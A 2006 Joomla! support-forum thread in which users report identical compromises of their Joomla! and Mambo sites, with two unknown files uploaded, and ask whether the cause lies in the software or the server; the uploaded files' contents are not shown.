Site Hacked - 2 files uplaoded...

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
TWDesigns
Joomla! Enthusiast
Joomla! Enthusiast

Site Hacked - 2 files uplaoded...

Post by TWDesigns » Mon Jan 09, 2006 5:13 am

Here is what was uploaded to all the sites that were hacked.  I asked before posting this to make sure it was ok and I'm no programmer so someone else can take a looksee.
And
I've changed every pass I have and restored backups to be safe.  So if anything above looks like or decodes to a password no worries  :P
All sites were the latest Joomla! (patched)
One site was a much older version that I used for testing.. it had MOS_ tables so probably one of the firsts. It was off by it's self on a seperate domain.
No other software was installed on any other than Joomla! and 3rd party components.  None were components mentioned in other threads by users with the same problem.

.... Anything else I can give as far as information let me know!  ???

webguy
Joomla! Ace
Joomla! Ace

Re: Site Hacked - 2 files uplaoded...

Post by webguy » Mon Jan 09, 2006 7:43 am

Exactly the same on the sites of my client.
My client was running Mambo 4.5.2.3.

Question is: is this Mambo/Joomla related or is it a server issue?
René Kreijveld
http://www.renekreijveld.nl | Joomla! professional

j00be
Joomla! Apprentice
Joomla! Apprentice

Post by j00be » Mon Jan 09, 2006 9:03 am

Re TWDesigns Post

Can you give us a list of third party modules, bots and components you had installed? This could help define the issue better.

Thanks!

Christer
Joomla! Fledgling
Joomla! Fledgling

Post by Christer » Mon Jan 09, 2006 9:17 am